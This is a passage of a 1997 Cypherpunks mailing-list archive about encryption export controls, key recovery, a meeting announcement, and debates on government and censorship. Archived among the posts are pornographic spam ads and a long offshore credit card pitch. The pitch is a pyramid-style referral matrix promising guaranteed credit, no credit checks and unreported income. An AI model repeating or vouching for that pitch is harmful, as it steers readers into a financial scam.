that would seemingly not apply to a product developed 
completely by Canadians. Earlier drafts were more 
vague and seemed to target any relationship or 
aid, but the final version focused on technical 
assistance. 

Companies with close relationships with the U.S. 
government are still circumspect. Steve Walker,
president of the Glenwood, Md.-based [*]Trusted 
Information Systems, works closely with the Commerce 
Department to seek approval for all of its work 
done in Europe. They ask for a license for all 
of the software being developed by their subsidiary 
in Britain. "We've tried to be very careful about 
this, perhaps more careful about it than we need 
to be," Walker said and then pointed out, "We're 
getting approval." 

[*]Sun Microsystems is pursuing a strategy with 
a different corporate structure. The company bought 
a minority stake in a Russian network software 
company in 1993 and recently asked them to develop 
encryption software for the world market. The deal 
is undergoing scrutiny from the U.S. Department 
of Commerce, but no announcement has been made 
about the resolution. Sun announced that they hope 
to ship the software on August 15. 

Still, the range of a government is hard to measure. 
Greg Katsas, a lawyer in the Washington office 
of Jones, Day, Reavis, and Pogue, said: "Generally,
the rules of jurisdiction of the place of incorporation 
apply, but there are cases where U.S. law reaches 
outside the boundaries. For instance, anti-trust 
law can cover acts done outside the U.S. intended 
to have an impact inside the U.S." 

All of the major software companies like Microsoft,
IBM and Sun continue to press the U.S. government 
for relief of the export control laws, arguing 
that better and better software is emerging throughout 
the world. In the House of Representatives, legislation 
sponsored by Representative Bob Goodlatte, a Republican 
from Virginia, to liberalize export laws has found 
wide support, while similar legislation in the 
Senate has died. 

One of the major initiatives offered by the Clinton 
administration would ease export licenses for software 
that made it possible for law enforcement officials 
to obtain the software's keys with a court order. 
They propose lifting the restrictions for exporting 
the software using 56-bit keys with DES. 

A number of businesses have joined together what 
they call the Key Recovery Alliance to help negotiate 
with the government about the final implementation 
of this plan. Most major software vendors, including 
Entrust and Sun, are part of the alliance. While 
the companies are committed to producing software 
that helps recover encryption keys in emergencies,
there is a great deal of debate about how this 
will be carried out. 

Entrust's product for office groups does offer 
key recovery, but it is a far cry from what the 
U.S. government would like to see implemented. 
Copies of the keys are only stored on the hard 
disk of the employee responsible for overseeing 
the network. There is no capability right now for 
interfacing with trusted third parties who would 
serve as recovery agents for the police. 

Still, Entrust also seems to be working to meet 
U.S. regulations. Their enterprise-wide system 
for larger companies has been granted a license 
for U.S. export even though it uses 56-bit keys. 
This license was recently granted as part of the 
United States' push for key recovery. It signifies 
that the U.S. Commerce Department felt that Entrust 
was moving toward compliance with the policy of 
smoothing access for the police. In two years, 
Entrust may integrate their key recovery system 
with licensed recovery agents or it could face 
losing its U.S. license. 

In the long run, this strategy continues to receive 
heavy resistance. While many businesses welcome 
key-recovery solutions for internal use, they seem 
to resist making it too easy for the police to 
access their documents. Corporations, after all,
can be found guilty as well. 

The same rules apply to countries, which are finding 
themselves in an increasingly brutal worldwide 
competition for dominance. Countries with the most 
liberal export laws may be rewarded with a strong 
fraction of the market share and this is the crucial 
time when the decisions about product acceptance 
are being decided. Many MIS managers may choose 
Entrust's products simply because they don't need 
to fill out forms with the U.S. government in order 
to supply it to all of their foreign subsidiaries. 

Andrew Csinger is the President of Xcert, a Vancouver-
based Canadian software company that manufactures 
encryption technology used for certification authorities. 
He expects that any difference between U.S. and 
Canadian encryption laws will be short-lived. "I 
think that market pressures are going to force 
the U.S. administration to respond more quickly,
" he said. "In reality, cryptography is widely 
available throughout the world." 


Copyright 1997 The New York Times Company


- -> Send "subscribe   snetnews " to majordomo at world.std.com
- ->  Posted by: kalliste at aci.net (J. Orlin Grabbe)


------- End of Forwarded Message






From jito at eccosys.com  Fri Aug  1 22:57:47 1997
From: jito at eccosys.com (Joichi Ito)
Date: Sat, 2 Aug 1997 13:57:47 +0800
Subject: thanks...
Message-ID: <199708020550.OAA04024@eccosys.com>



Thanks to everyone who sent me information about Key Recovery.

FYI, I gave a fairly objective update on the current status of the bills being
debated in the US, distributed the Walsh Report (missing some paragraphs)
and reviewed John Davidson's comments on the report, distributed and
reviewed "The Risks of Key Recover, Key Escrow and Trusted Third-Party
Encryption", distributed and reviewed most of the material written by
Carl Ellison, reviewed the recent letter from Janet Reno to Congress,
distributed Whit Diffie's May '93 testimony on Clipper, and finished by
distributing materials from the TIS site, in particular going over RecoverKey.

I can't tell you about any of the other stuff that is currently being
presented
in the study group, but once the report becomes public, I will try to get
an English version up on the Net. It should end up being the Japanese
National Poice Agency's official position on Key Escrow, Certification
Authorities, and several other issues.

I will be participating in another study group soon to discuss many of
these issues with the Self Defense Force from the point of view of
Japanese national security as well as another NPA study group on
what to do about "crackers"... Anyway, if anyone who can give me some
insight into these areas will be at HIP, I'd love to chat. ;-)

Thanks again.

- Joi

P.S. I am not a "policeman" but an outside boardmember of these
study groups. The ministries are under quite a bit of scrutiny these
days and the study groups tend to be quite frank and balanced.
The reports don't always dictate the law, but since most politicians
do not have real staffers, therefore most of the expert study is done in the
ministries.

--
Finger jito at nsm.eccosys.com or jito at garage.co.jp for PGP Key
Fingerprint for RSA PGP Key ID 0x0EE23A2D
0D3A 7AAA 3DA8 E7B3  3AF1 C6FA B7ED D834
Fingerprint for DSS/Diffie-Hellman PGP Key ID 0x2D9461F1
58F3 CA9A EFB8 EB9D DF18  6B16 E48D AF2A 2D94 61F1
Home Page: http://domino.garage.co.jp/jito/joihome.nsf
To subscribe to my personal mailing list send mailto:friends-subscribe at ito.com




From Raymond.Mereniuk at mat.calvex.com  Fri Aug  1 23:33:25 1997
From: Raymond.Mereniuk at mat.calvex.com (Raymond Mereniuk)
Date: Sat, 2 Aug 1997 14:33:25 +0800
Subject: "Telco Terrorism" -- Wired on Baby Bells v. the Net
In-Reply-To: 
Message-ID: <199708020537.WAA05914@mat.calvex.com>




>If the Telcos move to raise rates, the internet will cease using the 
>Telco system.  And then some telephone interface company will create 
...deleted text...

The Telcos have always lived in a monopolistic environment, they 
can't see the world in any other manner.  One can say many bad things 
about these people.  

Fortunately, there may be reason for them to change their ways in 
regards to Internet access.  Canada is not the most competitive place 
in the world and most Canadians just accept this and pay more money 
then they should for goods and services with no questions to the 
system which forces such things as `Canadian Content' down their 
throats.  Bottom line is that business is not that competitive here.

I have been in the data communications business for a long time and 
dealt with bad service and attitude from Canadian Telcos.  Recently 
the local cable company (Rogers Cablesystems) started offering 
Internet access through a cable modem for CAN$55/month (US$39.95).  
This gives you the cable modem with some sort of asymmetrical data 
transfer rates.  They don't tell you the actual up-stream and 
down-stream data transfer rates but apparently you can get 6 - 10 
times the download rates as possible through a 33.6Kbps modem.

This might at first glance appear a bit expensive but it is a 
permanent connection.  They give you one IP address and up to five 
Email addresses under the standard monthly fee (there is a bit-count 
with charges if you go over the maximum but the limit is in GBs).  
The cable modem rental is included.  They charge CAN$150 (US$109) for 
installation and setup.  Included in this install fee is an Ethernet 
card.  Compare this to ISDN or installing an additional telephone 
line PLUS paying for ISP access.

If you are not careful everyone on your local cable segment can see 
your sytem but what the hell don't you want to get to know your 
neighbors better???  If you are technologically more than clue-less 
you would install a Linux box as a firewall and give it the assigned 
IP address.  Behind your firewall you could install...  whatever?!  
If you have a network, well that can be connected also!??  They will 
do the DNS work (probably at extra charge as this is the cable 
company) and set you up as a sub-domain on their domain and you could 
run a POP3 server to send/receive mail.  

This sounds pretty good, I could go for this, and they even offer it 
in my neighborhood.  But, I must move soon so I will do it in the 
fall after the move.  Now the local Telco (BC Tel, owned by GTE) gets 
a new chairman and the newspaper lets him blow his own horn and puts 
the article on the front page of the local section of one of the 
regional newspapers (Vancouver Sun).  In this ego flexing article the 
CHAIRman states that their market and engineering 
trials are almost over and that they will be offering ADSL for 
Internet access in the fall and that they have a big surprise in 
store for the local cable company as they can beat their Internet 
access offering.  Since that article the local Telco has filed an 
ADSL tariff offering with the federal regulatory body with a 
requested response date of August 27th as they want to begin offering 
this service in the market this fall.  

Are we about to see an elephant tapdance???  If this elephant is 
about to learn to tapdance maybe there is hope for the other Telcos 
of North America.  If by chance I got into the wrong medication 
please advise.  
Virtually


Raymond at wcs.net
Raymond Mereniuk






From 34355680 at rocketmail.com  Sat Aug  2 14:41:47 1997
From: 34355680 at rocketmail.com (34355680 at rocketmail.com)
Date: Sat, 2 Aug 1997 14:41:47 -0700 (PDT)
Subject: Sexy Images...
Message-ID: <>


* Sexy * Erotic * Lewd and Desirable...

LIVE NUDE DANCERS - 24 hours a day

>>>The Hottest Adult Web Site on the Net<<<

Check it out for FREE!!!

Right Now! > Go to...

http://209.14.30.103/115/

or AOL users can click below...

Sexy Adult Web Site

You must be of legal age in your jurisdiction
to enter this Web Site!

Thank You.






From 34355680 at rocketmail.com  Sat Aug  2 14:41:47 1997
From: 34355680 at rocketmail.com (34355680 at rocketmail.com)
Date: Sat, 2 Aug 1997 14:41:47 -0700 (PDT)
Subject: Sexy Images...
Message-ID: <>


* Sexy * Erotic * Lewd and Desirable...

LIVE NUDE DANCERS - 24 hours a day

>>>The Hottest Adult Web Site on the Net<<<

Check it out for FREE!!!

Right Now! > Go to...

http://209.14.30.103/115/

or AOL users can click below...

Sexy Adult Web Site

You must be of legal age in your jurisdiction
to enter this Web Site!

Thank You.






From tcmay at got.net  Fri Aug  1 23:52:37 1997
From: tcmay at got.net (Tim May)
Date: Sat, 2 Aug 1997 14:52:37 +0800
Subject: Joichi Ito as a Junior Policeman
In-Reply-To: <199708020550.OAA04024@eccosys.com>
Message-ID: 



At 10:31 PM -0700 8/1/97, Joichi Ito wrote:

>I can't tell you about any of the other stuff that is currently being
>presented
>in the study group, but once the report becomes public, I will try to get
>an English version up on the Net. It should end up being the Japanese
>National Poice Agency's official position on Key Escrow, Certification
>Authorities, and several other issues.

And why are you helping to write a report that will be the "official
position" of the Japanese cops?


>I will be participating in another study group soon to discuss many of
>these issues with the Self Defense Force from the point of view of
>Japanese national security as well as another NPA study group on
>what to do about "crackers"... Anyway, if anyone who can give me some
>insight into these areas will be at HIP, I'd love to chat. ;-)

And why are working for the "Self Defense Force" (the Japanese DOD, for
those not familiar with the terminology).

The JDF is notoriously militaristic. You should reconsider this.

And Cypherpunks should be very careful about "advising" an obviously
co-opted member of the Japanese military and police establishment.

Use crypto to undermine such entities, not support them. Crypto will
unleash anarchy on the world.

>Thanks again.
>
>- Joi
>
>P.S. I am not a "policeman" but an outside boardmember of these
>study groups. The ministries are under quite a bit of scrutiny these
>days and the study groups tend to be quite frank and balanced.
>The reports don't always dictate the law, but since most politicians
>do not have real staffers, therefore most of the expert study is done in the
>ministries.

You sound like a "junior policeman" to me.

Another person to add to the killfiles.

--TCM

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From rwright at adnetsol.com  Sat Aug  2 00:37:34 1997
From: rwright at adnetsol.com (Ross Wright)
Date: Sat, 2 Aug 1997 15:37:34 +0800
Subject: Joichi Ito as a Junior Policeman
Message-ID: <199708020732.AAA12484@adnetsol.adnetsol.com>



On or About  1 Aug 97 at 23:46, Tim May wrote:

> You sound like a "junior policeman" to me.

I smelled bacon.  And I thought I saw Doughnut crumbs.

> Another person to add to the killfiles.

Hey, not me.  You gotta know what the bad guys are up to.

=-=-=-=-=-=-
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: (408) 259-2795






From straightedge.dave at sk.sympatico.ca  Sat Aug  2 00:57:21 1997
From: straightedge.dave at sk.sympatico.ca (David Yaffe)
Date: Sat, 2 Aug 1997 15:57:21 +0800
Subject: Jim Bell & e-commerce
In-Reply-To: <3.0.2.32.19970730223642.007b2100@ece.eng.wayne.edu>
Message-ID: <3.0.2.32.19970802014824.007c9a10@mailhost.sk.sympatico.ca>



Hi,
I'm fairly new to the list and to crypto/political issues.. 

question one: What did Jim Bell do that go him into trouble?
question two: If all non-key-escrow crypto systems become banned, won't
that make e-commerce illegal? 
Thanks
David
"You can take my PGP when you pry it from my cold, dead fingers"






From ron at ebonyworld.com  Sat Aug  2 16:24:16 1997
From: ron at ebonyworld.com (ron at ebonyworld.com)
Date: Sat, 2 Aug 1997 16:24:16 -0700 (PDT)
Subject: Hot Nude Male & Female Pics!!
Message-ID: <199708022252.SAA10907@56-1.clever.net>


Ladies and Gentlemen,

This e-mail is an announcement for a totally new website. The site contains extremely high quality color pictures of nude black muscular men and fine black women. The pictures are not pornographic in nature (Playboy & Playgirl Quality)....but are definitely worth checking out none-the-less!!! If you should find this email to be offensive or if young children are accessing it just reply to us with "remove" in the subject box. We will make sure that you are not contacted again. However, we are sure that you will find this site to be thoroughly enjoyable. http://www.ebonyworld.com

If you would like to evaluate HUNDREDS of super high quality nude color photos of beautiful fine black women and/or gorgeous muscular well endowed brothas then go to visit http://www.ebonyworld.com. You could even win a trip for two to Jamaica just for registering!!

Be sure to check out our newest Hot Black Strip Club, Best of Players Magazine and Black Inches Magazine Areas. These areas feature top erotic models such as Heather Hunter, Janet Jacme, Charmaine Sinclaine, Dominique Simone, Stiff Omar & Big Rolando!!!

BONUS (Can't Say We Don't Give Back!!): Each week we raffle off $50 to 10 lucky current members. At the end of each month we raffle off $100 to 5 lucky current members. At the end of each 6 month period we raffle off 3 free 200MHz Gateway 2000 Pentium Pro Multimedia Computers. And at the end of each year we give away 2 free trips to Jamaica to two lucky members and their guest. All you have to do is join Ebony World Online...THAT'S IT...You're entered into the sweepstakes automatically!!! (When you join...be sure to give us your name and e-mail address so that you will be entered into our drawings) GOOD LUCK!! (Odds of winning are 1 in 26)

Must be 18 years old to go to http://www.ebonyworld.com





From kent at songbird.com  Sat Aug  2 02:12:40 1997
From: kent at songbird.com (Kent Crispin)
Date: Sat, 2 Aug 1997 17:12:40 +0800
Subject: free market services vs monopoly government
In-Reply-To: <19970731182720.53925@bywater.songbird.com>
Message-ID: <19970802015614.65348@bywater.songbird.com>



On Fri, Aug 01, 1997 at 11:32:04AM +0100, Adam Back wrote:

After reading your long response I have one general comment:

"No Fair!"

Remember your rhetorical question that started this: "indeed why have
any governments at all?" That reflects a *vastly* different position
than favoring less government.  Analogy: it would be better for my
health if I ate less.  It would not be good at all for my health to
eat zero.  Your rhetorical question posed the "zero" position for
government, and that was the position I was arguing against.  

But your reasoning is this, apparently: "Kent says he doesn't believe
it is possible for a human society to not have a government, therefore
Kent favors big intrusive government." This kind of "reasoning" is
rife on cypherpunks; may I suggest it is beneath you?

With that little thing out of the way:

[...]
> > Consequently, a statement like "Government is always bad" is ipso
> > facto a shallow generalization, and my natural reaction is to point
> > out that sometimes government is good.
> 
> I'll admit there are situations where a government may make a good
> decision, or handle a situation not too badly, or not that
> restrictively.  Such situations are quite rare though, aren't they :-)

Compared to what? Compared to an imagined libertarian utopia, or
compared to really bad situations (say, North Korea), or Cambodia
under Pol Pot? In fact, you and I live lives of unbridled luxury,
compared to a majority of the human race.  Our government has 
something to do with that.  Put another way: your debit governments 
for the bad things they do, but you don't credit them for the bad 
things they prevent.  A fair analysis would include both.

[...]

> > I don't think of government as a "necessary evil", either.  Rather,
> > I think that a government of some kind is an inevitable outgrowth of
> > human nature.  I think this for three compelling reasons: first, it is
> > obversationally true -- there are essentially no human beings who live
> > without a government of some kind; second, because it is in agreement
> > with all my observations and knowledge of human nature; and third,
> > because it makes sense to me as the rational consequence of the
> > existence of force as an interpersonal interaction. 
> 
> As a general rule: less government intervention is more efficient than
> more.

Re: my eating habits, above.

> This is because the free market is better at meeting people's
> demands in a tailored fashion than any socialist/communist planned
> economy handed down by a few big-wigs.

That's hardly a recommendation, now is it?

> Are you against privatisation?  Are you against deregulation?

In general, no.

[...]
> > In fact, of course, the US generates a great deal of wealth for its
> > citizens, who are among the best off and most productive of any nation
> > on earth.  Of course it could be better, but it could be a whole lot
> > worse.  To say that the form of government had nothing to do with that
> > *success* is intellectually dishonest -- one can just as easily argue
> > that things are good in the US largely *because* we have a relatively
> > good government. 
> 
> Jeez, just imagine how much better off you could be without all the
> government crapola.

How so? I could have more money? That's a rathole without a bottom --
I have an adequate supply.  More personal freedom? The main constraint
on me is lack of time to enjoy the freedoms I already have.  If I 
make a realistic assessment of my life, less government isn't going 
to make any significant difference, and I wager that it wouldn't make 
any significant difference to you, either.  We are both members of 
the technological elite, doing pretty damn much what we please, and 
having a good time doing it.

So I am not a good example of someone who might be better off.  Well,
how about someone not in our fortunate position? That's not clear
either, but for entirely different reasons.  In the US the economy has
done very well the last few years, but there is this troubling
undercurrent about the poor getting poorer and the rich getting richer
-- the economy isn't like the tide -- it doesn't seem to float all 
boats.  And I have no confidence that the unfettered free-market 
utopia you dream about is going to be equitable in its distribution 
of wealth.

[...]

> > > eg. I can go buy into Uncle Enzo's pizza delivery and protection
> > > racket because the protection is 5000% better value for money than the
> > > Feds deal.
> > 
> > How do you get out from Uncle Enzo's protection racket when things go 
> > sour, if Uncle Enzo doesn't allow his customers to leave, or even to 
> > say anything bad about him?
> 
> Anyway you just buy into Mr Lee's New Hong Kong protection racket, and
> Uncle Enzo will respect Mr Lee's fire-power enough to consider it not
> worth the effort of picking on small fry like you.

Mr Lee isn't interested in dealing with you -- he will deal with 
Uncle Enzo.  You are an insignificant pawn to both of them, and they 
will divide up their turf according to their own concerns.  Force 
monopolies don't overlap, generally.  But anyway, this is another one 
of those intellectual tinkertoys of freedom...

[...]

> Cultural and societal change have happened in the past.  I guess
> you've read of the feudal systems.  Well society's structure has
> changed.  If you lived in feudal systems, you'd be one of the serfs
> happy with his lot tithing to the lord of the manor, and to the fat
> church, and being left with barely enough to eat.

Yep. Probably.  Everybody was.  That didn't change through serf 
revolts, to my knowledge -- it changed through growth of a merchant 
class. 

[...]
> See anything wrong with making a currently relatively free government
> into an even less restrictive government?

Nope.  It's something I work on, believe it or not.

> Tell me, are the following insane ideas:
> 
> 	- privatisation
> 	- deregulation
> 	- devolution of government power to smaller power bases
> 	- lower taxes
> 	- fewer politicians
> 	- reduced social security system 
> 	- cancel the war on drugs

No.  Obviously not, as I favor all of them :-)  You said, however, 
"any government at all."

[...]

> [I took the perl rsa usage to a new post]

OK.  I now have "RSA, the song" as a midi file, which I will post in 
the next day or two...

-- 
Kent Crispin				"No reason to get excited",
kent at songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html






From editors at commonwealthpub.com  Sat Aug  2 17:26:25 1997
From: editors at commonwealthpub.com (editors at commonwealthpub.com)
Date: Sat, 2 Aug 1997 17:26:25 -0700 (PDT)
Subject: Authors Wanted
Message-ID: <199707291955.NAA10805@mail.commonwealthpub.com>


Authors Wanted

North American publisher requires book length manuscripts in
all genres for possible publication. Translation services
available.

Reply with outline or synopsis to:
Commonwealth Publications,
email: editors at commonwealthpub.com
fax: (403)-432-9409

Visit our website at http://www.commonwealthpub.com





From money at guaranteed.com  Sat Aug  2 17:44:44 1997
From: money at guaranteed.com (money at guaranteed.com)
Date: Sat, 2 Aug 1997 17:44:44 -0700 (PDT)
Subject: Credit Card w/$5,000 Limit GUARANTEED - NO CREDIT CHECK/SSN
Message-ID: 


This is a one-time message.  If not interested, please delete, and you will never hear from us again.

$5000 WORTH OF CREDIT GUARANTEED!!

 * You Receive 2 Major Offshore Credit Cards!
 * A total of $5,000 worth of Credit (Unsecured) AND...
 * (optional) $10,000 - $15,000 Line of Credit (5.95% APR)!!!
 * Line of Credit could expand after 6 months to $25,000-$100,000!!!
 * NO Credit Check or Income Verification!
 * NO Social Security Number Required!
 * NO Deposits or Collateral Funds (Unsecured)!!
 * Bad Credit, No Credit, Bankruptcy, NO PROBLEM!!!
 * Amazing 4.95% APR!!!
 * GUARANTEED APPROVAL!!!
 * 3 x 6 forced matrix could earn you $6,941 (or more) per month!!
 * Complete Financial Privacy!

Our services could provide you with the funds you need to run your business effectively, or help you obtain the CREDIT that you deserve for use in everyday life.

BEST OF ALL....You may NEVER AGAIN have to pay for anything you charge!

****************************************************************************
As more domestic banks say "NO" to credit card applicants, an ever increasing number of credit card applicants find their way to safe and confidential offshore banks.  It's no secret that once you have established a few not so good remarks on your credit record, you will find it very difficult to obtain credit again.  

When you go offshore, however, your credit record is of NO real consequence.
Remember, going offshore places you in a NEW jurisdiction.  In most cases,
these new offshore locations do not even have credit reporting requirements.
The secrecy and confidentiality laws prohibit the release of one's banking
transaction.  Should anyone working in these offshore banks even so much as
say "Yes, this person has an account with us," SEVERE penalties of fines
and/or imprisonment could result for the non-complying bank employee!

Can you now see the tremendous advantages of having an offshore bank card?
Unless you , yourself, leave a paper trail, nobody at the offshore bank will release your credit card records.

How many people do you know who would love to have an Offshore Bank Card?
Hundreds? Thousands? Tens of Thousands?  Your OFFSHORE INCOME from referring others to our program will reflect how many people you can introduce to the
program. And remember, there is NO 1099 issued on that income!

You will benefit from your personal advertising efforts in two ways:

1) You will receive a $25 BONUS CHECK for every person that you personally sponsor.  PAID WEEKLY!!!  (only 4 referrals will earn back your initial processing fee).

2) Matrix participants will receive monthly commissions for all participants in your downline.
 
IT'S EASY TO APPLY!

Simply email to offshorecard at answerme.com and complete the Request Form with a payment of only $100.00.

How do I make payments on my credit card?

Your credit card may be paid through any ATM bank machine in the world or by mail, but... YOU MAY NEVER HAVE TO MAKE A PAYMENT!

When you choose us to help you get an Offshore Card you're automatically put into a 3 x 6 forced matrix (forced meaning that, if you fill one level, every person that's signed up under your automatically goes on to fill your next level, and so on) could earn you $6941.00 per month! You will be paying $25 per month in dues to the club for services rendered. This $25 will be DEBITED EACH MONTH from your account, and will allow you to receive commission checks for the banking activities of every person in your downline!

Matrix participants are recruited through a network of distributors worldwide. Participants earn monthly commissions on the dues ($25) paid by every member in good standing under them in a 3 x 6 forced matrix. 

Monthly commission schedule is as follows:  
Level 1 - 0% ($1.25) times 3 referrals on this level...[3x$0]..........$0.00
Level 2 - 10% ($2.50) times 9 referrals on this level....[9x$5].......$22.50 
Level 3 - 5% ($1.25) times 27 referrals on this level....[27x$1.25].$33.75
Level 4 - 10% ($2.50) times 81 referrals on this level..[81x$2.50]..$202.50
Level 5 - 20% ($5.00) times 243 referrals on this level.[243x$5.00].$1215.00
Level 6 - 30% ($7.50) times 729 referrals on this level.[729x$7.50].$5467.00

Total: $6941.25 Per Month!!

(referrals are the number of people underneath you in the matrix--a combination of the people you refer, and the people they refer, etc.)

All the money earned as a result of matrix participation is deposited AS A PAYMENT to the member's credit card account! If their commissions
exceed the minimum monthly payment, no further payments are required that month.  (i.e. enroll 3 people in a month and you will more than likely have covered
your minimum payment for anything you charge that month, just from the enrollee's bonuses! Develop a large downline, and your entire monthly charges
could be ZEROED OUT each month!), or better yet, you will receive $6941.00 CREDIT in your account!  Imagine what you could do with $6941.00 PER MONTH CREDIT!!

NO REPORTING OF YOUR CARD ACTIVITY TO CREDIT BUREAUS: 
Since these cards are not issued through the North American banking institutions and credit reporting systems, the existence and details of your account activity are not disclosed to government agencies or credit bureaus.

ASSET PROTECTION: 
Your card deposits are virtually unreachable by creditors.

PRESTIGE: 
Impress your friends and business clients with your card issued by an offshore bank of international reputation.

Plus, of course, all of the regular benefits of a universally recognized and accepted credit card; Identification and check guarantees; Dining out, hotel and car rental reservations, travel, and much more!

Matrix participants agree to pay $300.00 per annum for services rendered by our club. This amount is charged to your credit card in 12 monthly installments of $25.00 each, and is then re-distributed among active Matrix Participants according to the above schedule.

For an application & FAQ email offshorecard at answerme.com

P.S. - EXTRA OFFER - If you'd like information on obtaining 2 MORE Guaranteed Cards (same application fee, amount of credit and opportunity to earn money), please email application at answerme.com and we'll send off the applications to you ASAP!

Thank you for your time.  This will be one of the best decisions that you ever make!!!





From shamrock at netcom.com  Sat Aug  2 03:10:24 1997
From: shamrock at netcom.com (Lucky Green)
Date: Sat, 2 Aug 1997 18:10:24 +0800
Subject: August Cypherpunks Meeting Announcement
Message-ID: <3.0.2.32.19970802120325.006985f4@netcom10.netcom.com>



This month's SF Bay Area Cypherpunks meeting will take place at a new
location. Please pay close attention to the directions.

We will have several interesting topics to talk about, but have very
limited time. Please be there on schedule or you will miss the good stuff.

When:
Saturday, August 9, 1997 at 1:00 PM PDT. [22:00 local]

Where:
The Workshop tent, HIP'97 Campground, Almere, The Netherlands.

How to get there:
Take any plane from SFO to Shipol. Then follow the directions at
http://www.hip97.nl/route.html

This month's topics include:
o The electronic release of the PGP 5.0 platform independent source code.
o An introduction to the PGPcdk, a cryptographic toolkit.
o The Onion Router beta release.
o Practical phone encryption.
o Fast crypto on a smartcard.

What to do if you get lost:
Call me at my cell phone. +31 (0)6 5373-5125.

See you there,


--Lucky Green 
  PGP encrypted mail preferred.
  Be HIP and join us for HIP'97 in Amsterdam.
  http://www.hip97.nl/






From announce at dmail1.prognet.com  Sat Aug  2 04:46:39 1997
From: announce at dmail1.prognet.com (RealAudio & RealVideo News)
Date: Sat, 2 Aug 1997 19:46:39 +0800
Subject: Hear 30 Full-length Albums from Warner Bros. Records in RealAudio
Message-ID: <199708021034.DAA00156@dmail2.prognet.com>



Dear RealPlayer User,

Thank you for using RealPlayer software
for RealAudio and RealVideo.

I'm writing to tell you about a special
offer available exclusively for users
of the enhanced RealPlayer Plus.

If you order and download RealPlayer Plus,
you'll get access to 30 full-length albums
from Warner Bros. Records, presented in RealAudio.

RealPlayer Plus delivers benefits you
can't get anywhere else, including: 

- The best quality audio and video at 28.8

- One-button scanning for the best
  live audio & video on the web

- Instant access to your favorite RealAudio
  and RealVideo content with preset buttons

- Packaged CD-ROM and manual plus
  free telephone technical support 

Please visit our Web site for more information
or to download RealPlayer Plus:

   http://www.real.com/wbr/order.html

I hope you enjoy RealPlayer Plus,

Maria Cantwell
Vice President of Marketing,
Progressive Networks


---------------------------------------------
 For information about this e-mail including
 how to subscribe to or unsubscribe from
 future announcements, please visit:
 http://www.real.com/mailinglist/index.html






From declan at pathfinder.com  Sat Aug  2 06:14:47 1997
From: declan at pathfinder.com (Declan McCullagh)
Date: Sat, 2 Aug 1997 21:14:47 +0800
Subject: Jim Bell & e-commerce
In-Reply-To: <3.0.2.32.19970802014824.007c9a10@mailhost.sk.sympatico.ca>
Message-ID: 



David,

Check out netlynews.com and search for Assassination. That'll get you
my story on Bell from early April.

-Declan

On Sat, 2 Aug 1997, David Yaffe wrote:

> Hi,
> I'm fairly new to the list and to crypto/political issues.. 
> 
> question one: What did Jim Bell do that go him into trouble?
> question two: If all non-key-escrow crypto systems become banned, won't
> that make e-commerce illegal? 
> Thanks
> David
> "You can take my PGP when you pry it from my cold, dead fingers"
> 
> 






From paul at fatmans.demon.co.uk  Sat Aug  2 07:08:10 1997
From: paul at fatmans.demon.co.uk (Paul Bradley)
Date: Sat, 2 Aug 1997 22:08:10 +0800
Subject: Yet another self-labeling system (do you remember -L18?)
In-Reply-To: <33DF81CF.1662D004@cptech.org>
Message-ID: 





> > Persuation is not the point, it is not necessary to persuade people
> > that
> > censorship is morally wrong in order for it to be so.
> 
>      Well, if persuasion is "not necessary," then why do you care about
> anyone's views on this?

I don`t give a fuck about anyone elses views, however, I debate such 
points here and elsewhere for my own personal pleasure, the real power to 
change things comes through the use of technology, not debate.

>     On your other point, I really don't agree that is morally wrong to
> take steps to prevent children from having access to pornography. 
> People may propose ways of doing this which are objectionable, but the
> basic goal is hardly immoral.  Indeed, many think it is immoral not to
> protect children.

Foo. I see no point in pursuing this any further.


        Datacomms Technologies data security
       Paul Bradley, Paul at fatmans.demon.co.uk
  Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: FC76DA85
     "Don`t forget to mount a scratch monkey"







From paul at fatmans.demon.co.uk  Sat Aug  2 07:11:40 1997
From: paul at fatmans.demon.co.uk (Paul Bradley)
Date: Sat, 2 Aug 1997 22:11:40 +0800
Subject: Spam is Information?
In-Reply-To: 
Message-ID: 




> almost totally redundant.  Instead of posting 1 message,
> 1000 messages are posted.  The 2nd through 1000th message
> add no more information than the first.  This would not be a
> problem if the network had infinite bandwidth and storage
> capabilities.  

1. When a message is cross-posted using the "newsgroups:" line only one 
copy is sent to the news-spool and is seen in all the relevent newsgroups.

2. Bandwidth requirements are no justification for censorship, unless you 
own the equipment you are removing the messages from, even then it is 
reprehensible.

        Datacomms Technologies data security
       Paul Bradley, Paul at fatmans.demon.co.uk
  Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: FC76DA85
     "Don`t forget to mount a scratch monkey"






From paul at fatmans.demon.co.uk  Sat Aug  2 07:21:21 1997
From: paul at fatmans.demon.co.uk (Paul Bradley)
Date: Sat, 2 Aug 1997 22:21:21 +0800
Subject: Yet another self-labeling system (do you remember -L18?)
In-Reply-To: 
Message-ID: 




> It generally is not morally wrong to take steps to prevent children from
> having access to pornography, provided they're your children or you have a
> custodial relationship. 

I used to be of broadly this opinion, and still am conviced it is so, 
However, I think we have to separate saying something is not morally 
wrong from encouraging it, I believe parents may censor their childrens 
access to information as they see fit, but I don`t think they should.

        Datacomms Technologies data security
       Paul Bradley, Paul at fatmans.demon.co.uk
  Paul at crypto.uk.eu.org, Paul at cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: FC76DA85
     "Don`t forget to mount a scratch monkey"






From dlv at bwalk.dm.com  Sat Aug  2 08:30:42 1997
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 2 Aug 1997 23:30:42 +0800
Subject: non-censorous spam control (was Re: Spam is Information?)
In-Reply-To: <199707311344.IAA17797@mailhub.amaranth.com>
Message-ID: 



"William H. Geiger III"  writes:

